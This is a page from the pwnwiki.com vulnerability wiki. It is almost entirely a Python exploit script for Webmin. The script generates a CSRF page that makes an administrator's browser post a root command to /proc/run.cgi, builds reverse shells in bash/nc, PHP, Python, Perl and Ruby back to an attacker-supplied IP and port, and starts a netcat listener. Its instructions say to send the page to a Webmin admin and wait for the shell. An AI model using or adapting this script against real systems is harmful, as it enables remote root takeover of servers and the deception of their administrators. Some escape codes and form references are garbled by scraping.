免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
截图
EXP
import time, subprocess,random
print('''\0331;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\0331;m''')
for i in range(101):
print(
"\r\0331;36m > POC By \0331;m \0331;37mMesh3l\0331;m \0331;36m ( \0331;m\0331;email protected_911\0331;m\0331;36m ) & \0331;m \0331;37mZ0ldyck\0331;m\0331;36m ( \0331;m\0331;email protected\0331;m\0331;36m ) \0331;m {} \0331;m".format(
i), "\0331;36m%\0331;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\0331;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \0331;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\0331;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \0331;m")
port = input("\0331;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \0331;m")
ReverseShell = input \
('''\0331;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\0331;m
\0331;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \0331;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("/bin/sh","-i");' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\0331;36m \n Please Re-Check ur input :( \0331;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms0.submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\0331;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \0331;m")
def Netcat_listener():
print()
subprocess.run("nc", "-nlvp "+port+"")
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
免费、自由、人人可编辑的漏洞库--pwnwiki.com
